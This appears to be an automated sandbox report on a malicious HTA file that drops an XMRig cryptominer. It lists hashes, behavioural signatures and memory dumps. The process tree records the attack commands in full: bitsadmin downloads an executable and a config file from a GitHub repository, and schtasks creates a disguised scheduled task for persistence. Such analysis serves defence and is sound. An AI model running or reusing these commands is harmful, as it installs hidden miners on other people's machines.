Overview

overview

10

Static

static

1

service.hta

windows7-x64

8

service.hta

windows10-2004-x64

10

Analysis

  • max time kernel
    145s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27/03/2025, 03:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    service.hta

  • Size

    2KB

  • MD5

    0028c690c43f28fe571cd968627127a1

  • SHA1

    fb8672d3e91ab19eb698785d89dc19b57469c69f

  • SHA256

    3ccad5317d4c96825a9d45d9be545bf0c6d5aff47b6d3a0193aed10cd375208c

  • SHA512

    9b63653284c8fa136ec87b82a2123bad839e746c5d5663f3c2c8f7f4bd4b11258193de2e3cffb34151818c10855d890ef3a74b5a9bdb3841379bbd25c5acc020

Score
10/10
xmrigdiscoverydropperminer

Malware Config

Signatures

  • Xmrig family
    xmrig
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 11 IoCs
    miner
  • Download via BitsAdmin 1 TTPs 2 IoCs
    dropper
  • Downloads MZ/PE file 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\service.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2028
    • C:\Windows\SysWOW64\bitsadmin.exe
      "C:\Windows\System32\bitsadmin.exe" /transfer down https://github.com/safe0909/check/raw/refs/heads/main/solr.exe C:\Users\Admin\AppData\Local\Temp\cache\solr.exe
      2⤵
      • Download via BitsAdmin
      • System Location Discovery: System Language Discovery
      PID:2700
    • C:\Windows\SysWOW64\bitsadmin.exe
      "C:\Windows\System32\bitsadmin.exe" /transfer down https://raw.githubusercontent.com/safe0909/check/refs/heads/main/config.json C:\Users\Admin\AppData\Local\Temp\cache\config.json
      2⤵
      • Download via BitsAdmin
      • System Location Discovery: System Language Discovery
      PID:5184
    • C:\Windows\SysWOW64\hostname.exe
      hostname
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1008
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN "Tomcat service for Windows Service" /TR C:\Users\Admin\AppData\Local\Temp\cache\solr.exe /MO 30 /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Scheduled Task/Job: Scheduled Task
      PID:1108
    • C:\Users\Admin\AppData\Local\Temp\cache\solr.exe
      "C:\Users\Admin\AppData\Local\Temp\cache\solr.exe"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:3352

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\cache\config.json
    Filesize

    2KB

    MD5

    6f07942f30a8b913caf4be251642f772

    SHA1

    5cdae29c77b5df6c8ce4910463222396dd0ee641

    SHA256

    902c786afb78720413e57c3fd7ae959d594ac9fc01fc5cc0da8ba6cde484c6bc

    SHA512

    fcd5d4f3f7526c55688fe6f29781232689480206ececcdab88e951e8cd82e38cc23f86ed3653aa64908bc0520105ab3cdb42568dbe2f4f598c33f8a9cb348fe0

    Download Submit

  • memory/3352-1-0x000001E78C1D0000-0x000001E78C1F0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/3352-4-0x00007FF7516E0000-0x00007FF752313000-memory.dmp

    Filesize

    12.2MB

    Download

  • memory/3352-5-0x00007FF7516E0000-0x00007FF752313000-memory.dmp

    Filesize

    12.2MB

    Download

  • memory/3352-6-0x00007FF7516E0000-0x00007FF752313000-memory.dmp

    Filesize

    12.2MB

    Download

  • memory/3352-7-0x00007FF7516E0000-0x00007FF752313000-memory.dmp

    Filesize

    12.2MB

    Download

  • memory/3352-8-0x00007FF7516E0000-0x00007FF752313000-memory.dmp

    Filesize

    12.2MB

    Download

  • memory/3352-9-0x00007FF7516E0000-0x00007FF752313000-memory.dmp

    Filesize

    12.2MB

    Download

  • memory/3352-10-0x00007FF7516E0000-0x00007FF752313000-memory.dmp

    Filesize

    12.2MB

    Download

  • memory/3352-11-0x00007FF7516E0000-0x00007FF752313000-memory.dmp

    Filesize

    12.2MB

    Download

  • memory/3352-12-0x00007FF7516E0000-0x00007FF752313000-memory.dmp

    Filesize

    12.2MB

    Download

  • memory/3352-13-0x00007FF7516E0000-0x00007FF752313000-memory.dmp

    Filesize

    12.2MB

    Download

  • memory/3352-14-0x00007FF7516E0000-0x00007FF752313000-memory.dmp

    Filesize

    12.2MB

    Download